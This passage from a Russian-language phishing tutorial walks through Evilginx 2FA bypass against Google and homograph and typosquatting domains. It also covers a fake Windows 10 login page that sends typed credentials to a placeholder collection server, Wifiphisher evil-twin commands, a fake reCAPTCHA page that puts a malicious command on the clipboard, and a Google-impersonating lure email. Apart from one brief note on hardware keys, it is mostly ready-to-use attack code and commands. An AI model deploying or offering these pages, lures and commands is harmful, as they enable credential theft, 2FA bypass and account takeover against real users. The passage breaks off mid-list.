  &lt;p id=&quot;vKCW&quot;&gt;&lt;strong&gt;Evilginx 3.0&lt;/strong&gt; — это мощный инструмент для проведения продвинутых фишинговых атак, специально разработанный для обхода &lt;strong&gt;двухфакторной аутентификации (2FA)&lt;/strong&gt;. Он работает как обратный прокси-сервер, перехватывая и передавая данные между жертвой и легитимной службой. Это позволяет злоумышленникам захватывать учетные данные для входа и токены аутентификации, даже когда жертва использует 2FA, включая одноразовые пароли на основе времени (TOTP) и SMS-коды.&lt;/p&gt;
  &lt;h3 id=&quot;t5Ef&quot;&gt;Сценарий атаки: Использование &lt;strong&gt;Evilginx 3.0&lt;/strong&gt; для фишинга и обхода 2FA&lt;/h3&gt;
  &lt;p id=&quot;cVPn&quot;&gt;&lt;strong&gt;Настройка и конфигурация: &lt;/strong&gt;Evilginx работает как посредник (MITM) между жертвой и настоящей страницей для входа. Он может захватывать как имя пользователя и пароль, так и сессионный токен, который создаётся после успешного прохождения 2FA.&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;aiVz&quot;&gt;phishlets hostname google phishingdomain.com
phishlets enable google
lures create google&lt;/pre&gt;
  &lt;ul id=&quot;nuGL&quot;&gt;
    &lt;li id=&quot;WAqg&quot;&gt;Теперь Evilginx клонирует страницу входа Google на домене &lt;code&gt;phishingdomain.com&lt;/code&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;giDE&quot;&gt;&lt;strong&gt;Создание фишинговой ссылки:&lt;/strong&gt; После включения &amp;quot;&lt;code&gt;phishlet&lt;/code&gt;&amp;quot; и &amp;quot;&lt;code&gt;lure&lt;/code&gt;&amp;quot;, Evilginx генерирует фишинговую ссылку, которая перенаправит жертв на поддельную страницу для входа.&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;4OgC&quot;&gt;lures get-url 0&lt;/pre&gt;
  &lt;ul id=&quot;Ljpt&quot;&gt;
    &lt;li id=&quot;qwc1&quot;&gt;Эта ссылка будет выглядеть как реальная страница входа и использовать HTTPS, что сделает атаку более убедительной.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;UToP&quot;&gt;&lt;strong&gt; Проведение фишинговой атаки&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;iIZT&quot;&gt;
    &lt;li id=&quot;VryS&quot;&gt;&lt;strong&gt;Отправка фишинговой ссылки: &lt;/strong&gt;Атакующий отправляет фишинговую ссылку жертве через электронную почту, SMS или с помощью социальной инженерии.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;oFen&quot;&gt;&lt;strong&gt;Фишинговое письмо:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;ggz5&quot;&gt;Тема: Срочно: Необычная попытка вход

Привет,
Мы обнаружили необычную попытку входа в ваш аккаунт Google. Пожалуйста, перейдите по ссылке ниже, чтобы подтвердить вашу личность:
https://phishingdomain.com/google/login

С уважением,
Команда безопасности Google&lt;/pre&gt;
  &lt;ul id=&quot;gpd8&quot;&gt;
    &lt;li id=&quot;7gvI&quot;&gt;&lt;strong&gt;Жертва вводит учетные данные:&lt;/strong&gt; Когда жертва нажимает на ссылку, её перенаправляют на поддельную страницу входа, хостируемую Evilginx. Она вводит свои учетные данные и код 2FA.&lt;/li&gt;
    &lt;li id=&quot;jvUd&quot;&gt;&lt;strong&gt;Evilginx захватывает учетные данные и 2FA-токен:&lt;/strong&gt; Evilginx перехватывает имя пользователя, пароль и токен 2FA (OTP) и передаёт их настоящей службе. Служба возвращает сессионную куку, которую также захватывает Evilginx.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;6sa3&quot;&gt;&lt;strong&gt;Пример захваченных учетных данных:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;Zl3m&quot;&gt;[201.202.45.12] [google] [user@gmail.com] [password123]
[google] Сессионная кука захвачена: GA1.2.1234567890.session&lt;/pre&gt;
  &lt;p id=&quot;ZhPf&quot;&gt;&lt;strong&gt;Механизмы защиты от фишинга с Evilginx и обхода 2FA&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;5cPM&quot;&gt;Для защиты от таких сложных атак на фишинг необходим многоуровневый подход:&lt;/p&gt;
  &lt;ul id=&quot;7l4p&quot;&gt;
    &lt;li id=&quot;VR8f&quot;&gt;Использование аппаратных ключей FIDO2/WebAuthn: Хотя Evilginx может обойти традиционные методы 2FA (TOTP, SMS и т.д.), аутентификация на основе аппаратных ключей, таких как FIDO2 или WebAuthn, не может быть скомпрометирована при атаке &amp;quot;человек посередине&amp;quot;. Эти устройства генерируют криптографический ключ, уникальный для каждой сессии, что делает его кражу невозможной.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;HQFi&quot;&gt;&lt;strong&gt;Пример:&lt;/strong&gt; &lt;strong&gt;YubiKey&lt;/strong&gt; или &lt;strong&gt;Google Titan Key&lt;/strong&gt;.&lt;/blockquote&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;7BIV&quot; data-align=&quot;center&quot;&gt;8. Омографические атаки&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;1Q85&quot;&gt;&lt;strong&gt;Омографические атаки&lt;/strong&gt; — это тип фишинговой атаки, которая использует визуальное сходство символов из разных наборов символов (обычно Unicode), чтобы создавать вредоносные URL-адреса, выглядящие почти идентичными легитимным. Злоумышленники используют такие обманные URL, чтобы обманом заставить пользователей перейти на вредоносные сайты, принимая их за настоящие. Эта техника особенно опасна, потому что пользователи могут не заметить незначительные различия между легитимными и вредоносными URL.&lt;/p&gt;
  &lt;blockquote id=&quot;oiQr&quot;&gt;Например, возьмем легитимный домен &lt;code&gt;apple.com&lt;/code&gt;. Атакующий может создать вредоносный URL, такой как &lt;code&gt;аррle.com&lt;/code&gt;, где символы&lt;code&gt; а&lt;/code&gt; и &lt;code&gt;р&lt;/code&gt; на самом деле являются кириллическими буквами, а не латинскими, как в легитимном домене. Для неподготовленного пользователя оба URL могут показаться идентичными, но они ведут на разные веб-сайты.&lt;/blockquote&gt;
  &lt;p id=&quot;NNXL&quot;&gt;Хакеры используют такие фальшивые URL в фишинговых письмах, кампаниях социальной инженерии или вредоносной рекламе, чтобы обманом получить конфиденциальную информацию, такую как учетные данные, данные кредитных карт или личную информацию.&lt;/p&gt;
  &lt;p id=&quot;VFFo&quot;&gt;&lt;strong&gt;Инструменты для омографических атаки:&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;akJC&quot;&gt;Хакеры могут использовать несколько онлайн-инструментов или скриптов для создания URL с омографами. Например, с помощью библиотеки Python&lt;strong&gt; idna&lt;/strong&gt; (Internationalized Domain Names in Applications) хакер может конвертировать символы Unicode в Punycode для регистрации доменов, похожих на легитимные.&lt;/blockquote&gt;
  &lt;p id=&quot;1kvp&quot;&gt;&lt;strong&gt;Пример создания домена омографа на Python:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;WHuu&quot;&gt;import idna
# Оригинальный домен
original_domain = &amp;quot;apple.com&amp;quot;
# Создание домена-омографа с использованием кириллических букв
homograph_domain = &amp;quot;аррle.com&amp;quot;
# Конвертация домена-омографа в Punycode
punycode_domain = idna.encode(homograph_domain).decode(
print(f&amp;quot;Домен-гомограф в Punycode: {punycode_domain}&amp;quot;
&lt;/pre&gt;
  &lt;p id=&quot;jjBi&quot;&gt;&lt;strong&gt;Результат:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;ilCS&quot;&gt;Домен-гомограф в Punycode: xn--80ak6aa92e.com&lt;/pre&gt;
  &lt;ul id=&quot;niBj&quot;&gt;
    &lt;li id=&quot;jo9U&quot;&gt;В данном примере кириллические буквы &amp;quot;&lt;code&gt;а&lt;/code&gt;&amp;quot; и &amp;quot;&lt;code&gt;р&lt;/code&gt;&amp;quot; выглядят как латинские, но на самом деле это разные символы.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;I8sD&quot; data-align=&quot;center&quot;&gt;9. Тайпсквоттинг&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;YV9P&quot;&gt;&lt;strong&gt;Тайпсквоттинг&lt;/strong&gt; — это ещё одна форма фишинговой атаки, при которой хакер регистрирует доменные имена, похожие на легитимные, но содержащие опечатки или небольшие вариации. Цель таких атак — использовать распространённые ошибки, которые пользователи совершают при вводе URL-адресов. Typosquatting-URL-адреса часто имитируют популярные веб-сайты, обманывая пользователей, которые думают, что они находятся на легитимном сайте.&lt;/p&gt;
  &lt;blockquote id=&quot;rYoc&quot;&gt;Например, легитимный домен может быть &lt;code&gt;google.com&lt;/code&gt;, но злоумышленник может зарегистрировать домен &lt;code&gt;gooogle.com&lt;/code&gt; (с дополнительной буквой &amp;quot;&lt;code&gt;о&lt;/code&gt;&amp;quot;). Если пользователь случайно введёт неверный URL, он может попасть на фишинговый сайт, созданный для кражи его данных.&lt;/blockquote&gt;
  &lt;p id=&quot;VIsB&quot;&gt;Хакеры также используют тайпсквоттинг для фишинговых атак через электронную почту, создавая письма, которые выглядят как отправленные с легитимных доменов, но немного изменённые. Например, письмо с адреса &lt;code&gt;support@paypal.com&lt;/code&gt; может быть подделано как &lt;code&gt;support@paypai.com&lt;/code&gt;.&lt;/p&gt;
  &lt;p id=&quot;hSHp&quot;&gt;&lt;strong&gt;Инструменты для тайпсквоттинг атак:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;gaPp&quot;&gt;
    &lt;li id=&quot;57FE&quot;&gt;Полезным инструментом для тестирования и генерации доменов с опечатками является &lt;a href=&quot;https://github.com/EmadYaY/PhishiUrl&quot; target=&quot;_blank&quot;&gt;PhishiUrl,&lt;/a&gt; доступный на GitHub. Этот инструмент автоматизирует процесс создания доменов с опечатками или похожих на легитимные, которые могут быть использованы для фишинговых атак.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;xyr2&quot;&gt;&lt;strong&gt;Пример использования PhishiUrl:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;0ndE&quot;&gt;git clone https://github.com/EmadYaY/PhishiUrl.git
cd PhishiUrl
python3 phishiurl.py --domain google.com --type squatting&lt;/pre&gt;
  &lt;p id=&quot;Xlbl&quot;&gt;Этот инструмент поможет сгенерировать список доменов, которые имитируют легитимный сайт, включая небольшие изменения или опечатки, что может быть полезно как для тестирования безопасности, так и для атак, если такие домены используются хакеры.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;AVQl&quot; data-align=&quot;center&quot;&gt;10. Фишинговые страницы на уровне OS&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;X0T8&quot;&gt;Фишинговые атаки могут быть направлены на кражу учетных данных операционной системы (OS) путём имитации страницы входа, которая выглядит аутентично для пользователя. Ниже приведён пример создания фишинговой страницы, имитирующей экран входа для Windows, macOS и Linux. Цель — получить учетные данные пользователя, когда он введет их на якобы легитимной форме входа.&lt;/p&gt;
  &lt;p id=&quot;nklI&quot;&gt;&lt;strong&gt;Фишинговая страница для Windows OS&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;OTfZ&quot;&gt;Эта фишинговая страница имитирует экран входа в Windows 10 и использует JavaScript для захвата учетных данных. Она предназначена для работы в режиме продажи (kiosk mode), чтобы предотвратить возможность выхода пользователя из приложения.&lt;/blockquote&gt;
  &lt;p id=&quot;jesa&quot;&gt;&lt;strong&gt;Инструкции по настройке:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;rSMB&quot;&gt;&lt;strong&gt;1. Создание файла &lt;code&gt;index.html&lt;/code&gt;: &lt;/strong&gt;Этот HTML-файл должен содержать форму для входа, стилизованную под экран входа Windows 10. Форма захватывает данные пользователя и отправляет их на сервер.&lt;/p&gt;
  &lt;pre data-lang=&quot;html&quot; id=&quot;x1zR&quot;&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;Windows 10 Login&amp;lt;/title&amp;gt;
    &amp;lt;style&amp;gt;
        body {
            font-family: &amp;#x27;Segoe UI&amp;#x27;, Tahoma, Geneva, Verdana, sans-serif;
            background-color: #1a1a1a;
            color: white;
            text-align: center;
            padding-top: 20%;
        }
        .login-container {
            background-color: #2d2d2d;
            border-radius: 8px;
            display: inline-block;
            padding: 20px;
        }
        input[type=&amp;quot;text&amp;quot;], input[type=&amp;quot;password&amp;quot;] {
            padding: 10px;
            margin: 10px;
            border-radius: 5px;
            border: none;
            width: 200px;
        }
        input[type=&amp;quot;submit&amp;quot;] {
            padding: 10px 20px;
            border-radius: 5px;
            border: none;
            background-color: #0078d7;
            color: white;
            cursor: pointer;
        }
    &amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;div class=&amp;quot;login-container&amp;quot;&amp;gt;
        &amp;lt;h1&amp;gt;Windows 10&amp;lt;/h1&amp;gt;
        &amp;lt;form id=&amp;quot;login-form&amp;quot;&amp;gt;
            &amp;lt;input type=&amp;quot;text&amp;quot; id=&amp;quot;username&amp;quot; placeholder=&amp;quot;Username&amp;quot; required&amp;gt;&amp;lt;br&amp;gt;
            &amp;lt;input type=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; placeholder=&amp;quot;Password&amp;quot; required&amp;gt;&amp;lt;br&amp;gt;
            &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Sign in&amp;quot;&amp;gt;
        &amp;lt;/form&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;script&amp;gt;
        document.getElementById(&amp;#x27;login-form&amp;#x27;).addEventListener(&amp;#x27;submit&amp;#x27;, function(e) {
            e.preventDefault();
            var username = document.getElementById(&amp;#x27;username&amp;#x27;).value;
            var password = document.getElementById(&amp;#x27;password&amp;#x27;).value;
            fetch(&amp;#x27;http://yourserver.com/collect&amp;#x27;, {
                method: &amp;#x27;POST&amp;#x27;,
                headers: { &amp;#x27;Content-Type&amp;#x27;: &amp;#x27;application/x-www-form-urlencoded&amp;#x27; },
                body: &amp;#x27;username=&amp;#x27; + encodeURIComponent(username) + &amp;#x27;&amp;amp;password=&amp;#x27; + encodeURIComponent(password)
            }).then(response =&amp;gt; response.text())
            .then(data =&amp;gt; console.log(data));
            // Показать сообщение об ошибке после отправки
            alert(&amp;#x27;Invalid password. Please try again.&amp;#x27;);
        });
    &amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
  &lt;p id=&quot;o75L&quot;&gt;&lt;strong&gt;2. Запуск в режиме продажи:&lt;/strong&gt; Запустите фишинговую страницу в режиме киоска (kiosk mode), чтобы пользователи не могли выйти из нее.&lt;/p&gt;
  &lt;p id=&quot;WDbW&quot;&gt;&lt;strong&gt;Chrome:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;EhxH&quot;&gt;&amp;quot;C:\Program Files\Google\Chrome\Application\chrome.exe&amp;quot; --kiosk file:///path/to/index.html&lt;/pre&gt;
  &lt;p id=&quot;DvHr&quot;&gt;&lt;strong&gt;Edge:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;7MLn&quot;&gt;&amp;quot;C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe&amp;quot; --kiosk file:///path/to/index.html --edge-kiosk-type=fullscreen&lt;/pre&gt;
  &lt;p id=&quot;EtIY&quot;&gt;&lt;strong&gt;Firefox:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;dmvQ&quot;&gt;&amp;quot;C:\Program Files\Mozilla Firefox\firefox.exe&amp;quot; --kiosk file:///path/to/index.html&lt;/pre&gt;
  &lt;p id=&quot;hLgn&quot;&gt;Этот пример демонстрирует, как хакеры могут создавать фишинговые страницы, имитирующие экран входа в Windows. Подобные атаки могут быть развернуты для кражи учетных данных пользователей, включая их имена и пароли.&lt;/p&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;xfiP&quot;&gt;11. Wi-Fi фишинг&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;7dlS&quot;&gt;&lt;a href=&quot;https://github.com/wifiphisher/wifiphisher&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Wifiphisher&lt;/strong&gt; &lt;/a&gt;— это универсальный инструмент, используемый в red teaming и для оценки безопасности Wi-Fi, позволяющий проводить сложные фишинговые атаки через беспроводные сети. Эта платформа помогает пентестерам создавать поддельные точки доступа и выполнять различные атаки для захвата конфиденциальной информации или распространения вредоносного ПО. Вот подробный обзор его функций и принципов работы:&lt;/p&gt;
  &lt;p id=&quot;Luwy&quot;&gt;&lt;strong&gt;1. Достижение положения Man-in-the-Middle (MITM)&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;yqrn&quot;&gt;Первый этап Wi-Fi фишинга — это создание положения «человек посередине» (MITM), когда злоумышленник становится посредником между целевыми клиентами и легитимной сетью. Wifiphisher использует несколько методов для этого:&lt;/p&gt;
  &lt;ul id=&quot;p7oA&quot;&gt;
    &lt;li id=&quot;bBGa&quot;&gt;&lt;strong&gt;Атака Evil Twin: &lt;/strong&gt;Создаётся поддельная точка доступа с таким же SSID, как у легитимной сети, чтобы обманом заставить клиентов подключиться к ней.&lt;/li&gt;
    &lt;li id=&quot;jA62&quot;&gt;&lt;strong&gt;Атака KARMA:&lt;/strong&gt; Имитируется общедоступная сеть, к которой устройства часто подключаются, заманивая их к поддельной точке доступа.&lt;/li&gt;
    &lt;li id=&quot;AYbK&quot;&gt;&lt;strong&gt;Атака Known Beacons:&lt;/strong&gt; Транслируется список распространённых SSID, к которым подключались устройства в прошлом, что увеличивает шансы успешного подключения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;6VFw&quot;&gt;Для повышения эффективности этих атак Wifiphisher отправляет пакеты деаутентификации или диссоциации, прерывая текущие соединения и вынуждая клиентов переподключиться к поддельной точке доступа.&lt;/p&gt;
  &lt;p id=&quot;UJeh&quot;&gt;&lt;strong&gt;2. Проведение фишинговых атак&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;szYY&quot;&gt;Когда &lt;strong&gt;&lt;a href=&quot;https://github.com/wifiphisher/wifiphisher&quot; target=&quot;_blank&quot;&gt;Wifiphisher&lt;/a&gt;&lt;/strong&gt; оказывается в позиции MITM, можно выполнять различные фишинговые атаки и распространять вредоносное ПО:&lt;/p&gt;
  &lt;ul id=&quot;7XoR&quot;&gt;
    &lt;li id=&quot;WcfY&quot;&gt;Веб-фишинг: Создаются и предоставляются поддельные страницы входа для захвата учетных данных ничего не подозревающих пользователей. Например, имитация диспетчера сети Windows может заставить пользователя ввести свой WPA/WPA2 Pre-Shared Key.&lt;/li&gt;
    &lt;li id=&quot;jIio&quot;&gt;Распространение вредоносного ПО: Можно настроить сценарии для доставки вредоносных программ на устройства жертв. Например, сценарий «Обновление прошивки» может предложить пользователю загрузить вредоносный файл, замаскированный под обновление прошивки.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;PGVU&quot;&gt;&lt;strong&gt;Пример выполнения атаки Evil Twin с кастомным сценарием:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;M0cu&quot;&gt;wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap&lt;/pre&gt;
  &lt;ul id=&quot;AXmY&quot;&gt;
    &lt;li id=&quot;190U&quot;&gt;Автоматическая нацеленность на конкретную сеть и сценарий:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;w3ot&quot;&gt;wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd&lt;/pre&gt;
  &lt;ul id=&quot;S2t6&quot;&gt;
    &lt;li id=&quot;VtNO&quot;&gt;Запуск открытой сети с фишингом через OAuth:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;EMGj&quot;&gt;wifiphisher --essid &amp;quot;FREE WI-FI&amp;quot; -p oauth-login -kB&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;D4XI&quot; data-align=&quot;center&quot;&gt;12. Капча на фишинге?&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;bRZ1&quot;&gt;Фишинговый метод с поддельной&lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt; reCAPTCHA&lt;/a&gt; включает создание страницы, которая имитирует реальную форму проверки&lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt; reCAPTCHA&lt;/a&gt;, чтобы обманом заставить пользователей выполнять вредоносные команды на своих системах. Этот метод использует привычность и доверие пользователей к формам &lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt; reCAPTCHA&lt;/a&gt;, чтобы обойти их бдительность в отношении безопасности.&lt;/p&gt;
  &lt;p id=&quot;gQ2V&quot;&gt;&lt;strong&gt;Сценарий атаки:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;uVqg&quot;&gt;&lt;strong&gt;Создание приманки: &lt;/strong&gt;Хакер создаёт поддельную страницу&lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt; reCAPTCHA&lt;/a&gt;, которая просит пользователей подтвердить, что они &amp;quot;не робот&amp;quot;. Дизайн этой страницы максимально похож на настоящую страницу проверки Google &lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt;reCAPTCHA&lt;/a&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;33vA&quot;&gt;На странице есть кнопка или форма, с которой взаимодействуют пользователи, и которая побуждает их открыть диалоговое окно &amp;quot;Выполнить&amp;quot; в Windows (Win+R) и вставить команду, которая была скопирована в их буфер обмена через фишинговую страницу.&lt;/blockquote&gt;
  &lt;p id=&quot;ZqVX&quot;&gt;&lt;strong&gt;Исполнение:&lt;/strong&gt; Когда пользователь вставляет команду в диалоговое окно, она выполняется на его системе. Эта команда может быть вредоносным скриптом или программой, предназначенной для кражи данных, установки вредоносного ПО или выполнения других вредоносных действий.&lt;/p&gt;
  &lt;blockquote id=&quot;GhPk&quot;&gt;Фишинговая страница может включать фальшивые сообщения об ошибках или дополнительные инструкции, чтобы пользователь не терял интерес и следовал до конца, выполняя команду.&lt;/blockquote&gt;
  &lt;p id=&quot;b7EI&quot;&gt;&lt;em&gt;Ниже приведён пример того, как настроить такую фишинговую страницу с помощью HTML, CSS и JavaScript, имитирующую интерфейс поддельной &lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt; reCAPTCHA&lt;/a&gt; и механизмы для выполнения команд.&lt;/em&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;html&quot; id=&quot;xo0f&quot;&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;Verify You Are Human&amp;lt;/title&amp;gt;
    &amp;lt;style&amp;gt;
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding-top: 20%;
            background-color: #f1f1f1;
        }
        .container {
            background: white;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
            display: inline-block;
        }
        .button {
            padding: 15px 30px;
            border: none;
            background: #4285f4;
            color: white;
            font-size: 16px;
            cursor: pointer;
            border-radius: 5px;
            margin: 10px;
        }
    &amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;div class=&amp;quot;container&amp;quot;&amp;gt;
        &amp;lt;h2&amp;gt;Verify you are human&amp;lt;/h2&amp;gt;
        &amp;lt;button class=&amp;quot;button&amp;quot; onclick=&amp;quot;showVerifyWindow()&amp;quot;&amp;gt;Verify&amp;lt;/button&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;script&amp;gt;
        function showVerifyWindow() {
            var command = &amp;#x27;your-malicious-command-here&amp;#x27;;  // Здесь должна быть ваша вредоносная команда
            var verificationCode = &amp;#x27;7624&amp;#x27;;  // Пример кода, можно рандомизировать
 // Показать фальшивое окно reCAPTCHA
            alert(&amp;#x27;Validation in the Run box to &amp;quot;hide&amp;quot; the command (✅ &amp;quot;I am not a robot - reCAPTCHA Verification ID: &amp;#x27; + verificationCode + &amp;#x27;&amp;quot;)&amp;#x27;)
          // Копирование команды в буфер обмена (пример замены на реальное выполнение)
            navigator.clipboard.writeText(command).then(function() {
                alert(&amp;#x27;Команда скопирована в буфер обмена. Откройте диалоговое окно &amp;quot;Выполнить&amp;quot; (Win+R) и вставьте её для продолжения.&amp;#x27;);
            });
        }
    &amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
  &lt;p id=&quot;by5Y&quot;&gt;&lt;strong&gt;Как это работает:&lt;/strong&gt;&lt;/p&gt;
  &lt;ol id=&quot;xhYZ&quot;&gt;
    &lt;li id=&quot;3X63&quot;&gt;&lt;strong&gt;Поддельная &lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt; reCAPTCHA&lt;/a&gt;:&lt;/strong&gt; Страница отображает кнопку &amp;quot;Verify&amp;quot;, которая симулирует процесс проверки &lt;a href=&quot;https://github.com/JohnHammond/recaptcha-phish&quot; target=&quot;_blank&quot;&gt;reCAPTCHA&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;5WTI&quot;&gt;&lt;strong&gt;Копирование команды:&lt;/strong&gt; Когда пользователь нажимает кнопку, JavaScript копирует вредоносную команду в буфер обмена.&lt;/li&gt;
    &lt;li id=&quot;O5D3&quot;&gt;&lt;strong&gt;Мошенничество с командой:&lt;/strong&gt; Пользователю предлагается открыть диалоговое окно &amp;quot;Выполнить&amp;quot; (&lt;code&gt;Win+R&lt;/code&gt;) и вставить скопированную команду, которая затем выполняется на системе.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;blockquote id=&quot;N3hU&quot;&gt;Эта атака ориентирована на пользователей, которые доверяют подобным формам проверки и не подозревают о том, что вводят вредоносную команду в свою систему.&lt;/blockquote&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;U2Ch&quot; data-align=&quot;center&quot;&gt;13. Поиск доменов с истёкшим сроком&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;MBVc&quot;&gt;Domain Hunter — это мощный инструмент предназначенный для поиска просроченных или доступных доменов, которые ранее использовались в безвредных целях, но могут быть перепрофилированы для фишинговых атак или задач командного управления и контроля (C2).&lt;/p&gt;
  &lt;p id=&quot;SBCE&quot;&gt;&lt;strong&gt;Основные функции:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;4lyL&quot;&gt;
    &lt;li id=&quot;73KQ&quot;&gt;Получение недавно истекших доменов с сайта ExpiredDomains.net.&lt;/li&gt;
    &lt;li id=&quot;JDHz&quot;&gt;Выполнение проверки репутации доменов через такие сервисы, как Symantec Site Review, IBM X-Force, и Cisco Talos.&lt;/li&gt;
    &lt;li id=&quot;yjdD&quot;&gt;Вывод результатов в текстовых и HTML-форматах с ссылками на источники проверки репутации и записи на &lt;code&gt;Archive.org&lt;/code&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;N978&quot;&gt;&lt;strong&gt;Примеры использования:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;5YZF&quot;&gt;&lt;strong&gt;Поиск доменов, связанных с определённой темой:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;ckmX&quot;&gt;
    &lt;li id=&quot;POBy&quot;&gt;Команда ищет просроченные домены, связанные с &amp;quot;apples&amp;quot;, проверяет их репутацию и обрабатывает CAPTCHA:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;zWQA&quot;&gt;./domainhunter.py -k apples -c --ocr -t5&lt;/pre&gt;
  &lt;p id=&quot;vwgt&quot;&gt;&lt;strong&gt;Проверка репутации одного домена:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;MYT3&quot;&gt;
    &lt;li id=&quot;P4qq&quot;&gt;Выполняется детальная проверка репутации для одного домена:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;nlbn&quot;&gt;./domainhunter.py --single mydomain.com&lt;/pre&gt;
  &lt;p id=&quot;NKOk&quot;&gt;&lt;strong&gt;Поиск и проверка недавно истекших доменов:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;hWy1&quot;&gt;
